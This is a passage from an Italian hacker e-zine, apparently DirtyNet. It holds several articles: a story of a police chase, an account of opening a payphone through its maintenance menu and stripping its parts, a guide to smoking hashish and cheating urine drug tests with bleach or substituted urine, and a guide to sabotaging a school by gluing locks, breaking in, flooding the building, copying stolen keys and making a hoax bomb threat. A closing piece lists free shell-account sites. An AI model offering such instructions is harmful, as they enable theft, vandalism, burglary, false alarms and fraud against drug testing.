ed anche questi si unirono ai colleghi. Vedendo che la situazione stava mettendosi
male decise di nascondersi in un portone di un palazzo, e cosi' riusci a svignarsela.
Incosciente che i poliziotti stavano ancora in agguato dopo solo dieci minuti usci
dal suo nascondiglio . Subito dopo essere uscito dal portone ecco che si ritrova
di nuovo i chips alle calcagne, mentre l altra coppia di sbirri gia aveva rinunciato..
Continuo' nella sua fuga: per prima cosa ando in una strada zeppa di auto, un vero
e proprio caos e li' riusci' a distaccarsi un po' dalla police perche' lui con la
sua vespa era molto piu' agile nel traffico; poi ando' verso
la periferia e se ne scappo in una stradina di campagna semi distrutta...
Ora per i poliziotti era davvero un bel problema perche' le loro moto non erano
adattte per questo tipo di strada.
Dopo dieci minuti, mio fratello ritorno sulla strada normale, e senza fare il buffone
si fece piu' di un kilometro in controsenso rischiando la morte...
i poliziotti continuavano a seguirlo , fino a quando due pullman nel
tentativo di sorpassarsi l'uno contro l'altro chiusero la strada a mio
fratello che per evitare l impatto con l automezzo dovette frenare bruscamente,
e il poliziotto a sua volta freno' anch'egli, pero' purtroppo la sua moto
non resse la frenata e quindi scivolo' provocando una brutta caduta
ai danni del poiziotto che per fortuna non si fece nulla di grave.
Alla fine pero' mio fratello cosciente di quello che aveva provocato accosto
per soccorrere il poliziotto che quando si alzo da terra , prima lo prese
a schiaffi e poi chiamo 'il carrattrezzi per sequestrare la vespa, inoltre
gli fece una multa di 500.000 lire per guida pericolosa ed altro...
Eccomi qui anche questo racconto è teminato, se avete voglia di parlarmi su tutto
quello che riguarda mezzing non esitate a chiamarmi, la mia E-mail la conoscete ma
per quelli che non ka conoscono ve la ripeto volentieri: jrash@hackersat.com
Vorrei salutare gli amici di #buonavolonta, e in particolare Maryee e alterego^..
Un bacio alla mia giada....A[v]a[t]A[r] il castoro........
/===========================::=============================::=================/
/ /Italian freching / A[v]a[t]A[r /
/===========================::=============================::=================/
ItAliaN FreChINg
Mi raccomando date un sguardo al disclaimer lo so che è palloso ma è pur
sempre obbligatorio.
DisclaiMer:
Questo testo è stato scritto a solo scopo informativo, i personaggi e i
contenuti presenti in questa narrazione sono da ritenersi frutto della
mente malata dell'autore che non si assume nessuna responsabilità per
gli atti dai voi commessi.Prima di fare qualche cazzata rifletteteci
su e se proprio volete farla prendetevi tutte le vostre responsabilità.
EnD Of disclaimer
Eccoci di nuovo a scrivere per dn che cresce sempre di piu sia in qualita che in
quantità. Io cerco di essere sempre utile con i miei testi e credo che questa
crescita sia dovuta anche al mio contributo.
Eppure stavo rischiando di non scrivere neanche un articolo per questa
edizione (forse vi avrebbe fatto piacere) visto che la scheda madre del
mio adorato pc se ne andata per sempre.In questo momento il mio computer
starà per essere riparato e quindi presto tornera ad essere utilizzato
al meglio.Sicuramente a tutti i lettori sara sorta un domanda che ritengo
scontata:
MA ALLORA COME CAZZO STAI SCRIVENDO QUESTO ARTICOLO.
Ed io tanto semplicemente vi rispondo:
STO SCRIVENDO QUESTO ARTICOLO DAL PC DI SYN.
aPPROPOSITO DI SYN (cazzo avevo dimenticato le maiuscole) lo sapevate che
sta imparando a suonare la chitarra.Vabbe penso che non ve ne freghi piu di tanto.
Cmq iniziamo con la narrazione che si appresta ad essere uno dei migliori
articoli della storia del phreaking.
Start of Narration
Era un sabato sera come tanti anzi no era peggiore infatti pioveva e io,syn,Jrash
minm e Zi_pePp fummo costretti ad uscire a piedi in cerca di un po di
divertimento.Dopo esserci messi d'accordo sulla destinazione ci incamminammo
verso il Mc_donald della mia città, per la strada parlavamo tranquilli dei
soliti problemi ignari di quello che ci aspettava qualche ora dopo.Arrivammo
al mC-capocchia e dopo aver mangiato qualcosa e aver tentato qualche impresa
di tacchinaggio ci avviamo sconsolati per le vie della città.
Quella sera camminammo non so per quanti chilometri forse 20 e alla fine
eravamo esausti; scausalmente ci fermammo a riposare su una sbarra , avete
presente quelle dei parcheggi o dei passaggi a livello,bene, e neanche a farlo
apposta indovinate cosa c'era a soli due metri di distanza,le nuovissime cabine
della Telekoz.Anche se non avevamo bevuto ne fatto uso di sostanze stupefacenti
eravamo fuori di brutto (il primo era il sottoscritto) mi diressi verso la
cabina rassicurato dalla calma della notte e la solitudine del posto.Arrivato
vicino alla cabina inizia a smanettare un po con la tastiera e credetemi
senza nenche fare un graffio alla cabina ne dando qualche colpo improvvisamente
il display si illumino e usci scritto:
MENU DI MANUTENZIONE: TEST DIAGNOSTICI
Da qui si poteva accedere a tutte le funzioni della cabina semplicemente muovendosi
con qualche tasto.Entusiasta chiamai Syn che appena arrivo esclamò:
BELLA AVA OTTIMO BRUTE FORZING
a questa frase io risposi:
MA QUALE BRUTE FORZING QUESTO SEMMAI E' UN CULE FORZING
Ora vi elenco lo schema dell'appendice "Test diagnostici"
TEST DIAGNOSTICI
---------------------
MODEM/AB
---------------------
MODULO BASE
---------------------
REVISIONI SW/HW
---------------------
TELEFONATA
---------------------
CONT. TELEFONATA
---------------------
LETTORE CARTE
---------------------
MODULO MONETE
---------------------
DISPLAY
---------------------
MICROTELEFONO
---------------------
LINEA
---------------------
BATTERIA
---------------------
SPORTELLO
---------------------
EEPROM/FLASH
---------------------
DTS
---------------------
FAX
---------------------
SERRATURA
---------------------
SCONTRINATRICE
---------------------
C
---------------------
BUS
---------------------
B.BUS
---------------------
GANCIO
---------------------
TASTIERA
---------------------
Bene queste erano tutte le voci che comparivano ed io dopo aver
trascorso piu di un ora ad esaminarle tutte senza pero ottenere
nessun risultato soddisfacente mi soffermai su la voce
"Sportello" e utilizzando i tasti sul lato sinistro della
cabina notai che compariva questa scritta:
SPORTELLO CABINA ---------> APERTO
A quel punto fui assalito da una strana sensazione che mi
rese immobile per qualche secondo.Passato questo istante come
per istinto misi le mani sul lato superiore della cabina e diedi
una botta secca.Lo sapete cosa accadde,mi ritrovai con la
parte anteriore della cabina in mano.
A quel punto inizia a vedere cosa conteneva al suo interno
la cabina ma visto che c'era ancora troppa gente in strada
decisi di socchiuderla e di tornare piu tardi per trafugare
qualche pezzo.Cosi io con gli altri boys ce ne andammo
a fare un giro maprima preso da un'iresistibile voglia mi
avvicinai alla cabina e mi presi un ricordino giusto per
non rimanere a mani vuote durante l'attesa.
Dopo aver strappato quel pezzo io con tutta la banda iniziammo
a correre per andare in un luogo piu solitario.Durante la corsa
urlai "Italian freching" da quella frase come potete intuire ho
preso spunto per il titolo.
Aspettammo in una stradina buia per un po e poi verso le ora 01:00
ci incamminammo per tornare sul luogo del delitto ma per la strada
notammo che la pula si era fermata proprio davanti la cabina.Noi
pensammo che fosse li causualmente e allora continuammo a camminare
dividendoci e facendo i tipi indifferenti.Io e ZI_Pepp eravamo quelli
che stavano piu avanti di tutti e avevamo gia superato la pula che
si era fermata con la volante qualche metro piu indietro di noi.
Ad un certo punto mi girai quardando nella loro direzione e vidi
che due agenti erano scesi dalla macchina e si stavano dirigendo
verso di noi con un passo molto veloce.
A questo punto io e gli altri iniziammo a correre e durante la
corsa ci dividemmo per rendere la vita piu difficile alla pula.
Dopo aver corso per non so quanto mi ritrovai solo con jrash e
Zi_Pepp sotto un ponticello non illuminato.SYn e gli altri non
avevo proprio idea di dove fossero andati a finire.Cmq dopo pochi
minuti mi arrivo una telefonata di syn che mi aveva detto che si
trovava in un luogo sicuro cosi dopo poco lo raggiungemmo.
Decidemmoche era meglio lasciar perdere per quella sera cosi ognuno
si ritiro a casa propria.
Arrivato a casa mi spogliai e dopo essermi messo il pigiama andai
a letto e poi........
Non penso voi abbiate voglia di leggere la cronaca della mia
vita quindi proseguiamo.
Ci rincontrammo tutti la sera seguente cosi con il solo
intento di finire il nostro lavoro
e cosi organizzati e armati di cacciaviti ci avvicinammo
alla cabina e asportammo tuto quello possibile.I pezzi che
trafugammo e di cui poi abbiamo anche scattato le foto che
dovrebbero essere allegate a Dirtynet sono i seguenti:
BATTERIA
lETTORE SCHEDE
DISPLAY
MODEM INTERNO
Abbiamo anche molti altri pezzi che ancora dobbiamo esminare,
in poche parole ci siamo portati la cabina a casa tranne pero
l'involucro di acciaio.Pensate che la cabina è ancora li chiusa
senza nulla dentro e vista dall'esterno sembra una normale cabina.
[Sul sito ufficiale di DirtyNet www.hackersat.com potete ammirare
anche le foto ricordo fatte in giorni successivi.]
Portammo tutti i pezzi nel garage di jrash e li esaminammo uno
ad uno.
Nell' esaminare il lettore schede notammo che esso è composto da tre
parti unite in sieme che potevano essere sganciate per mezzo di
semplici agganci.Smontando uno di queste tre pezzi notammo che
questo conteneva una sim card identica a quelle dei cellulari,
allora provammo ad inserirla nel telefonino di jrash ma non
accadeva nulla.Visto che sulla sim non era specificata la grandezza
in kb ho pensato che forse un normale telefonino non puo leggere
una carta sim di grandi dimensioni cmq questa è solo un'ipotesi
se qualcuno avesse qualche notizia puo farmelo sapere scrivendomi
alla solita e-mail.Ah dimenticavo sulla sim c'era un numero
probabilmente seriale ora vi riporto il codice sotto.
:
T0000928
000000001841
M64LEU2GSI
TEL. ITALIA
:
Bene abbiamo finito io vi ho detto proprio tutto spero che il
mio italiano sia comprensibile altrimenti un po di pazienza non
si puo avere tutto dalla vita.
Ringrazio:
-sYn che ha messo a disposizione il suo computer che mi ha permesso
di scrivere la prima parte di -questo articolo.
-Zi-Pepp,Jrash,MinM, anche loro prottagonisti di questa avventura.
-Tutti i ragazzi del Dj time che hanno fatto da colonna sonora di
questo articolo.
-Tutti le mie ammiratrici sparse per l'italia.
/===========================::=============================::=================/
/ /Maria consigli e oltre / phaet /
/===========================::=============================::=================/
NaRCoTiNG
Introduzione:
Prima abbiamo parlato della coltivazione della buonissima Maria ora
parliamo del suo utilizzo =)) (questa parte mi fa morire)!!! bisogna dire ke qui
a Salerno nn e' ke giri molta maria ma gira abbastanza Hashish e parlero' sopratutto di
quest' ultimo! Ultimamente ho provato nel cesso della scuola della crema di
marocco e devo dire ke e' mooooolto buona e sono rimasto sballato per circa 4 ore!!!!
PROVATELA RAGA!!!!
Come si rolla:
Per i meno esperti ho deciso di inserire questo breve articolo al rollaggio
ovvero alla kiusura della canna, joint, spinello o come cavolo lo volete kiamare:
Una canna si rolla come una sigaretta.
Arrotola il filtro tra pollice e indice di una mano.
Con l'altra mano (pollice, indice e medio) livellare il tabacco.
Avvolgere la cartina intorno al filtro e fare scorrere il foglio intorno al tabacco.
Leccare la gomma ed incollare la cartina.
Comprimere delicatamente il tabacco con una penna o un filtro di sigaretta.
Legare l' estremità della canna in caso di trasporto.
Non fumare più carta di quanto sia necessario!
Rollare la canna con la parte gommata all'esterno.
Umidificare la gomma e ripiegare la cartina, bruciare la carta eccedente.
Molto utile per gli spini o per le cartine King size.
MiNkIa KE PAuRa
vostra mamma vi fa fare le analisi delle urine per vedere se fumate??!! NO PROBLEM!!
(mia mamma me le ha fatte fare ultimamente e sono uscite negative cioe' pulite!)
METODI DI PROVA
Ci sono quattro tipi di test delle urine, una prova del capello, una prova di
traspirazione e di una prova di rimanenza.
Prima di continuare, devo dire che questo testo principalmente si applica all'analisi
delle urine che è il più diffuso perché è quello che costa meno. Tuttavia, provo a
coprire metodi per passare tutti i test.
1 Sostanze che sono individuabili:
La tavola sotto indica che cosa può essere trovato in prove di selezione.
[TABELLA]
Anfetamine
Antidepressivi .
Barbiturici
Benzodiazepine
Cannabinoidi
Cocaina .
LSD.
Metadone .
Morfina
Sonniferi .
Steroidi.
oltre al test delle urine vediamo prima quello del capello ke per molti e' un metodo
sconosciuto e vediamo come funziona:
Test del Capello: Quando i metaboliti del THC sono nel sangue, essi passano attraverso
i vasi di sangue nella testa e rimangono nei capelli. i metaboliti del THC rimangono
nei capelli come una registrazione permanente. La prova di capelli costa 300 - 600.000 e
è raramente fatta perché l'analisi delle urine è più economica (circa $130.000) e più
affidabile. ( l'apparecchiatura costa intorno al milione di $). Questo test consiste
nell'analizzare una ciocca di capelli, polverizzata e sciolta in solventi, attraverso
la Gas Cromatografia/Spettrometria di Massa. I capelli crescono in genere di 0,5 cm al
mese quindi si può indagare il passato se hai i capelli di 10 cm si può controllare il
tuo consumo di droga dei passati 20 mesi.
Passare la prova di capelli è estremamente difficile, per fortuna, la prova del capello
non ha validità legale.
Esistono sul mercato e si stanno sviluppando in America numerosi Shampoo ma la loro
efficacia è tuttora dubbia
TEST ESEGUITI PER RILEVARE ANTIDOTI AL TEST
I laboratori sanno come sia facile manomettere campioni di urina e modificare i risultati.
I laboratori fanno spesso prove per scoprire se il campione è legittimo.
1) colore: Se un campione di urina sembra chiaro, il laboratorio sospetterà che sia
stato allungato con acqua. È possibile che essi non lo descrivano come positivo, ma
essi possono rifiutare il campione e informare chi ha richiesto il test del tuo
tentativo di falsificare la prova. La vitamina B colora di giallo l'urina.
2) temperatura: L'urina dovrebbe essere tra 32 e 36 gradi. I laboratori controllano
la temperatura per prevenire l'aggiunta di acqua e la sostituzione dei campioni con
campioni puliti.
3) Creatina: è una sostanza prodotta da vertebrati e è presente nell'urina.
I Laboratori cercano la creatina per verificare che l'urina non venga sostituita
con qualcosa diverso. Mangiare cibi ricchi di carne rossa aumenterà i livelli di
creatina.
4) pH: il PH cambia facilmente quando la gente trucca il loro campione con prodotti
di fatti in casa. Utilizza cautela nel truccare l'urina, il pH è di solito testato.
5) Peso Specifico: un Peso Specifico insolito indica che un campione è stato manomesso.
E ora parliamo della fatidica URINA!!!!! ecco alcuni metodi per sputtanare il
laboratorio di analisi (10x a mio zio ke mi ha fornito i dati)
PRODUZIONE DI URINA PULITA
Il THC è solubile nei grassi, e viene conservato nelle tue cellule grasse.
Eliminarlo dai tessuti grassi è molto difficile. Molti prodotti erbacei sostengono
di ripulire il tuo corpo, tuttavia non fanno niente per rimuovere i sottoprodotti
del THC dalle cellule grasse.
Uno studio è stato fatto in Germania nel 1993 su 50 delle erbe più comuni utilizzate
dalla gente che prova a passare i test. Tutte le 50 erbe non sono riuscite a far
passare il test. Sfortunatamente, questa chiacchera non morirà. L'unico modo per
estrarre THC da cellule grasse è fare esercizio fisico (5.8). Le cellule grasse
secernono grasso con i metaboliti del THC a un tasso costante, indipendentemente
da quali erbe tu assumi. Tu puoi essere in grado di pulire temporaneamente THC
metabolites dal tuo flusso sanguigno o diluire i tuoi fluidi per produrre un
rapporto THC/urina minore, ma il tuo flusso sanguigno continuerà a ritirare il
THC dal grasso e la tua urina continuerà a ritirare metaboliti dal flusso sanguigno.
1) diluizione: Iper saturare il tuo corpo con fluidi diluirà i metaboliti possibilmente
sotto la 50 soglia ng/mL, a seconda del tuo metabolismo. Sii consapevole che i livelli
creatina vengono spesso testati e mostreranno che il campione è stato diluito. Diluire
il tuo campione produrrà anche urina chiara, senza potenzialmente alcun colore giallo.
È utile cominciare a bere subito prima della prova.
Quelli che si affogano in giorni fluidi prima di una prova causano solo disagio non
necessario. Quelli che stanno alzati tutta la notte bevendo non hanno maggiori
possibilità di uno che beve la pesantemente per prima cosa la mattina.
Alzati presto se la prova è di prima mattina, ma non perdere sonno se la prova è
di giorno.
1 acqua: Bevi almeno otto bicchieri grandi di fluido (preferibilmente acqua) appena
prima della prova. L'acqua non diluisce il THC ma solo l'urina e temporaneamente.
Risulta molto Utile.
2 livello di Creatina: Mangiare carne rossa aumenterà livelli Creatina. Se tu mangi
carne rossa 3 giorni prima della prova, il tuo livello di Creatina sarà normale e il
laboratorio non saprà che tu hai diluito il tuo campione di urina.
3 vitamina B: Colora di giallo il tuo campione portando a da 50 a 100 milligrammi di
vitamina B. Molte vitamine funzioneranno, ma B-2 o B-12 (trovati in vitamine B complesse)
sono le più efficaci, sebbene alcuni argomentano che la vitamina C sia migliore. Questo
aiuterà anche se tu prevedi di truccare il campione.
Questo non garantisce che la diluizione funzionerà se i livelli di Creatina, PH e il peso
specifico non sono rispettati.
2 diuretici: I diuretici fanno in modo che la gente urini frequentemente e che quindi il
campione risulti diluito. Caffè, succo di mirtillo, birra, tè, Pepsi e tisane, sono tutti
buoni diuretici.
3 aceto: C'è un mito che bere aceto maschera le droghe; Non è vero. Tuttavia, l'aceto
diminuisce il pH dell'urina. Le anfetamine sono espulse fino a 3 volte più velocemente
quando l'urina è più acida. Cosicché l'aceto potrebbe ridurre il periodo di tempo di
scoperta per anfetamine.
Non vale la pena bere aceto e causa diarrea.
5 fibra: Una dieta ricca di fibre aiuterà a espellere i metaboliti solubili tramite
l'intestino piuttosto che nell'urina.
7 Come dare un campione pulito: Non dare urina della prima pisciata del giorno. È la
più sporca e può essere piena di metaboliti. Urina un paio di volte prima di dare un
campione di prova. Inoltre, non dare l'inizio o la fine della pisciata. Piscia nel
gabinetto, quindi fermati velocemente e dai il campione, spostati al gabinetto per
l'ultima parte
8 esercizio fisico: Gli atleti hanno un grande vantaggio rispetto alle persone normali.
Quando il grasso è bruciato, i sottoprodotti del THC sono rilasciati nel sangue. Questo
è l'unico modo per espellere i metaboliti dai tessuti grassi. "la vita normale li
brucerà lentamente, quando i tessuti grassi li rilasceranno" (Dott. Grow).
Fare esercizio fisico pulirà il tuo corpo dai metaboliti più velocemente, diminuendo
così il periodo di scoperta. Smetti di fare esercizio una settimana prima della prova
perché siccome elimini metaboliti quando fai sport, la loro presenza nel sangue e
nelle urine è più alta. Essere pigro e mangiare molto farà si che il corpo immagazzini
i grassi e il metabolita viene a sua volta immagazzinato piuttosto che espulso.
ANTIDOTI ALLA DROGA
Alcune sostanze chimiche prese oralmente mascherano le tracce di droghe nell'urina.
Antidoti che funzionano:
1 L'Aspirina: prendere 4 aspirine alcune ore prima della prova potrebbe aiutarti.
L'aspirina interferisce con il metodo di test spettrometrico dell'urina e consiglio
certamente di sfruttare la situazione e utilizzare aspirina.
ALTERARE I CAMPIONI
"drogare" campioni consiste nell'aggiungere al campione varie sostanze chimiche.
Sostanze chimiche che impediscono all'immunoglobulina di legarsi all'antigene vi
faranno risultare negativi al test delle urine.
1 additivi Efficaci: Questi additivi sono raccomandati.
2 Candeggiante: Il candeggiante in Polvere vi varà risultare negativi e è il miglior
additivo fatto in casa. In un'emergenza, Jeff Nightbyrd raccomanda di aggiungere
cristalli di candeggina inodore a un campione diluito. Si raccomanda che macini la
candeggina polverizzata a un grano più fine. 1/4 cucchiaino da tè è raccomandato per
un campione da 60cc.
Se hai della candeggina liquida aggiungi al campione da 60cc da 6 a 10 gocce.
La candeggina però alza il Ph; cosicché può essere evidente che il campione era
manomesso. Alcune candeggine spumeggiano o lasciano residui, fai esperimenti con
varie marche prima di scegliere quale utilizzare.
3 acqua: Tu puoi diluire il tuo campione pesantemente con l'acqua. Puoi anche
aggiungere l'acqua direttamente al campione. Assicurati di utilizzare l'acqua
calda (tra 32 e 36 gradi), perché probabilmente prenderanno la temperatura del campione.
Fai sembrare che tu lavi le mani o qualcos'altro.
2 additivi Inefficaci: Questi additivi non sono raccomandati. Molti di questi
possono dare risultati di prova negativi, ma non sono raccomandati.
1 ammoniaca: 60 grammi renderanno il campione negativo. Ma il pH viene modificato e
l'odore di ammoniaca è facile da essere riconosciuto.
2 sangue: È stato detto che alcune gocce di sangue aggiusteranno il tuo campione;
non funziona
5 perossido di Idrogeno (Acqua Ossigenata): nelle concentrazioni in commercio
distruggerà metà dei metaboliti.
6 succo di Limone: Il succo di limone è un mito; non cambierà i risultati della prova.
7 sapone Liquido: Funziona, ma rende il campione torbido, è certamente sospetto.
8 il SuperClean 13 di Mary Jane
9 Purifyit : Creato in Europa, Oklahoma NORML (ditta americana) si rifiuta di rivendere
questo prodotto perché ha bocciato troppi conducenti di autocarro.
10 nitrato di Sodio: Questo è più efficace del sale da tavola(sotto), ma si scioglie male.
11 sale da Tavola: Due cucchiai da tavola di sale darà risultato negativo, ma mette la
densità fuori dalla gamma normale. Il residuo può essere visto anche in fondo alla provetta.
12 UrinAid : UrinAid, prodotto da Byrd Labs, è molto potente e funziona ogni volta
per mascherare il THC e nicotina ma non cocaina o eroina.
UrinAid è provato nel 5% dei laboratori. Oklahoma NORML ha cessato di vendere
questo prodotto perché è "troppo individuabile". In Italia probabilmente FUNZIONA.
13 aceto: Aggiungere aceto al tuo campione darà risultato negativo, ma fa cadere
anche il pH. Infatti, diminuire il pH è fa in modo che il campione sia negativo.
Ma il Ph viene testato e ti scopriranno.
14 Visine (Gocce Nasali): risultato discutibile. Byrd Labs ha concluso che Visine
non funziona. Clinton ha detto che il laboratorio in cui egli ha lavorato provava
Visine e ha concluso che Visine da una negazione falsa per l'esame delle urine
15 WD40: Un altro mito. WD40 può solo fare a danno.
3 additivi Non Testati
1 Papain: Questo è un enzima disponibile in farmacia. Non è risaputo se questo
faccia qualcosa. provato e può o non può funzionare.
9. SOSTITUZIONE DELL'URINA
Questo metodo funziona per ogni prova di urina, sempre.
Tu semplicemente dai a loro urina pulita (non la tua). Questo funziona molto bene se tu non
sei sorvegliato.
Se sarai sorvegliato, prova a chiedere di essere lasciato solo " non voglio che
mi guardi mentre piscio!.
1 metodi di Sostituzione: Ci sono tre metodi, ma due di loro sono dolorosi.
Il modo più comune è portare urina è in un contenitore nascosto.
1 contenitore Nascosto: Nascondi semplicemente l'urina. La prima volta che tu sei
solo con il contenitore che ti danno, scarica la tua urina nascosta.
Assicurati di potere aprire quietamente il contenitore; il personale di laboratorio
può origliare alla porta. Porta i pantaloni lunghi. Se così, un profilattico può essere
nascosto sotto i pantaloni vicino alla coscia.
Le femmine possono tenere un condom con il campione di urina nella vagina e pungerlo
con un'unghia e pisciare sotto supervisione. Assicurati di tenere i campioni tra 32 e 36 gradi.
2 dove ottenere urina pulita.
1 Urine da un donatore: Tu puoi usare l'urina di qualcun altro.
Chiedi (auspicabilmente un amico in cui puoi avere fiducia) al tuo donatore di urina
quali droghe essi hanno preso nel mese scorso. Se l'urina invecchia oltre 18 ore,
il deterioramento diventa notabile e il laboratorio può sospettare qualcosa.
1 Urina in Polvere: Conserva la tua urina quando sei sicuro di avere fatto un buon
periodo di astinenza, 30 giorni sono sicuri.
Urina in un contenitore di vetro. Fai evaporare. Quindi raschia l'interno
per il residuo. Mescolalo con l'acqua prima della prova e il campione avrà
la gravità specifica corretta, pH, colore, ecc.
3 urina di Cane: L'urina di cane può essere utilizzata nella sostituzione e passerà la prova!
Questa sotto sezione suppone che tu abbia un cane pulito. So che l'urina del
mio cane non passerebbe; egli mangia più erbaccia degli esseri umani.
Avrebbe più senso utilizzare urina umana, ma l'urina di cane può servire in un'emergenza.
10. RUBARE IL CAMPIONE
Rubare il campione, può funzionare perché il laboratorio non ammetterà mai che
il campione sia andato perso e non chiederà di rifare la prova.
Non aspettarti che questo metodo funzioni se tu vieni provato dalla
polizia o dai militari.
Finitoooooooooo!!! mi raccomando raga so ke nn mi starete mai a sentire ma io
lo debbo dire : usate questi consigli solo in casi urgenti vabbuo' si vede ke
ho appena fumato??
/===========================::=============================::=================/
/ /Come impallare la scuola / sYn /
/===========================::=============================::=================/
Salve ragazzi.
Se leggete questo articolo significa che odiate la scuola vero?
Se c'è qualcuno che la ama mi invi una email!
Io la scuola la odio da parte dei professori, xchè a me piace un sacco imparare le materie.
Comunque adesso facciamo male a questa stramaledetta struttura poco organizzata.
Vi incito tutti a farvi un giro di notte nella vostra amata scuola, vi potra' sempre servire.
Ad esempio per vedere le luci accese, le abitazioni vicine ecc...
Quando io e i miei amici entriamo nella scuola ci mettiamo ad impennare un po' col mezzo.
Naturalment vi potrete chiedere, come entriamo se è recintato?
A questa domanda poco posso rispondere. Infatti la nostra scuola è
minimamente protetta, x questo entra anche un motorino!
Dovreste scavalcare i recinti o fare altro...insomma con questa impresa dovete
cavarvela voi.
Adesso passiamo ad impallarla un po'.Andate di notte e nella serratura del cancello
principale inserite della colla (tipo attack) ad adesione istantanea o meglio
del silicone. In questa operazione potete abbondare con la sostanza.
I bidelli che vengono alle 7 proveranno in tutti i modi di liquefare la colla o altro.
una volta lo abbiamo provato ha funzionato ma... solo per 1 ora!
Naturalmente gli alunni staranno fuori dall'istituto ad aspettare che il problema
venga risolto, ma ben presto si risolvera' nel frattempo molti degli
alunni avranno gia fatto la saggia decisione di marinare !!
Il testo a questo punto sarebbe finito...ma voi mi odiereste a morte!
Allora passiamo ad un'altro imapallamento.
Poco graditi agli alunni sono i cosidetti "vermi".
Questi vermi (molti) dovreste gettarli per le scale o per le singole aule .
Inutile che ve lo dica, è meglio entrare nell'istituto di notte e gettarli, xchè
potrste facilmente essere presi con le mani nel sacchetto!
Ma avere accesso proprio nell'istituto è difficile; difficile solo se ci sono delle
protezioni anche alle finestre delle aule esterne.
Altrimenti dovreste avere le chiavi...ma questo ve lo spieghero' dopo.
Prendiamo di esempio che non ci siano protezioni ai vetri.
Andate 3 di voi (almeno in 3 dovete stare) nei pressi dell'istituto e organizzatevi
oltre a vedere se ci sono delle complicazioni.
Uno di voi deve rimanere nell'esterno dell'istituto .
Ognuno di voi deve possedere un telefonino con i toni silenziosi.
Il ragazzo che si trova all'esterno deve solamente avvertire se accade qualcosa.
Due di voi invece devono penetrare nell'istituto.
Spaccate con un panno sulla mano un vetro di una classe al primo piano ed entrate
facendo preferibilmente poco rumore. Ad andate per classe in classe a spargere i
vostri vermi (acquistate i bigattini o meglio quei vermi simili alle esche coreane..oppure
fabbricateli voi!).
Dato che ormai siete dentro ci sarebbe una notevole alternativa o diversivo ai soliti vermi.
Ovvero "l'allagamento".
Ebbene si la vostra scuola non è stata mai allagata ? C'è sempre una prima volta.
E' una cosa abbastanza semplice.Andate in quasi tutti i bagni e iniziato a chiudere
i lavandini e poi aprite i rubinetti al massimo. Potreste fare anche così :
Se ci sono delle pompe idrauliche potreste usarle e lasciale aperte,
posandole sul piano + alto dell'istituto. Fate questa operazione con cautela
e non troppo fracasso.
Bene una volta che avete finito quello che dovevate fare dentro l'istituto
dovete uscire.
Avvertite il compagno che state per farlo.
A questo punto l'ideale è uscire per un'altra parte, non per l'entrata principale della scuola.
Questo lo dovete fare sopratutto se accidentalmente scatta l'allarme mentre state dentro.
Ad esempio (mio istituto):
CAMPI
ingresso principale
- - - -- - - -- - - - - - - - --- -- - - - -- - |- -- - - - - - - - -- - -|- - --
/
/
/
/
c /
a /
m /
p /
i /
/
/
/
/
/ <--------------- qui potreste scavalcare o oltrepassare
/
/
/
/
/ -----------------------------------
/ \ \
\ \
\ \
\ \
\ \
------ \ \
- - \ \
- - \ \
- - \ ISTITUTO \
- - \ \
- - \ \
- - \ \
----- \ \
palestre \ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
-----------------------------------
|
| usatela solo se sbocca
| in isolati poco
| abitati
|
\/
| uscita secondaria |
------------------------------------------------------- -----------------
Questo che vi ho appena citato non sono tutti i medoti per mandare la scuola a puttane
ce ne sarebbero degli altri, pero' questi sono tra i migliori.
An piccolissimo esempio è scrivere con bombolette su tutti i muri frati ingiuriose o altro...
oppure la mattina fare una chiamata a scuola con una voce modificata dicendo che è
stata istallata un ordigno nascosto...alle media ci provammo funziono'.
Arrivarono i carabbi e restammo tutti noi alunni fuori per un'ora!!
METODO CHIAVI
Be' per alcuni potrebbe apparie uno stupido metodo...ma in realta' si puo' rivelare
DAVVERO soddisfacente. Non dovete fare altro che andare a scuola di
pomeriggio (per l'entrata principale!!) , praticamente quando tutti
ci possono entrare per fare i corsi pomeridiani. Se qualche bidello
da' fastidio dovete inventarvi una palla, magari che dovete consegnare
una cosa alla prof. (portatevi qualche foglio che dovrete presentare
alla prof se il bidello per caso vi accompagna!).
In qualche modo poi dovrete entrare nella famigerata "segreteria".
E cercare li tutti i mazzi di chiavi.So che per molti sara' una cosa
difficilissima ma noi abbiamo trovato i mazzi proprio li'!Dopodichè andate da un
ferramenta e fate la copia di tutte le chiavi, tanto costa poco (1000 £ a chiave circa).
E infine riportate il tutto nel posto dove l'avete trovate; questo deve avvenire
solo nel pomergiggio e non nei giorni seguenti.
MATERIALI per 3 persone
2 Torce, sopratutto se non c'è illuminazione
1 Scaletta, solo se è difficile raggiungere le finestre
3 Cellulari, per la comunicazione
Un abbigliamento che non da' nell'occhio. Preferibilmente nero.
2 Scooter fuori dal recintato farebbero comodo. Li lasciate parcheggiati.
1 Coltellino, che fa sempre comodo
1 Straccio, potreste usare anche la vostra maglia se è davvero vecchia
e naturalmente altro materiale come i vermi, per l'azione...
penso che basti.
sAluti
sYn syn@hackersat.com www.hackersat.com
/===========================::=============================::=================/
/ /Shell for lamah / Jrash /
/===========================::=============================::=================/
1° PARTE Introduzione
2° PARTE Procurarsi una shell
3° PARTE Cos è una shell
4° PARTE Connessione telnet con shell
5° PARTE Come registrare un account
6° PARTE Comandi fondamentali
1° PARTE
Salve ragazzi sono il vostro amicone Jrash, in questo articoletto vi parlero un po'
della shell, e cioè cos è, come si usa, eccetera....
Questo articolo è proprio per coloro che hanno voglia di imparare e cioè per coloro
che si possono definire Hacker alle prime armi, anche io sono uno alle prime armi
che pensate e questo e tutto cio che ho imparato finora...tutto questo, appunto lo
devo al mio grande amico A[v]a[t]A[r] che mi ha insegnato queste cosette basilari.
Ora passiamo alla parte interessante perche credo che con questa intro vi abbia annoiato....
attenti pero a quello che dico mi raccomando!!!
2° PARTE
Come procurarsi una shell??
Questa è proprio na bella domanda!
Non vi preoccupate che ci penso io a questo o gia provveduto! Ora vi daro un paio di siti
dove potete trovare tranquillamente una shell.
Eccovi i siti:
http://www.freeshells.net
http://www.cyberspace.org
http://www.continuum.eu.org
http://dishboy.dyn.ml.org
http://www.nyx.net
http://vester.dyn.ml.org
http://www.vexation.org
http://www.arbornet.org/projects.html
http://www.unixnet.org
Per avere maggiori informazioni riguardo a come procurarsi una shell gratis
andate a dare un occhiata all articolo del mio caro amico syn "FRREBIE E SHELL" che è
stato pubblicato nel numero 2 della rivista dirtynet...
Per accedervi, una volta trovata, basta aprire un qualsiasi telnet e digitare per
esempio cyberspace.org su host name, mentre lasciate invariate le altre impostazioni.
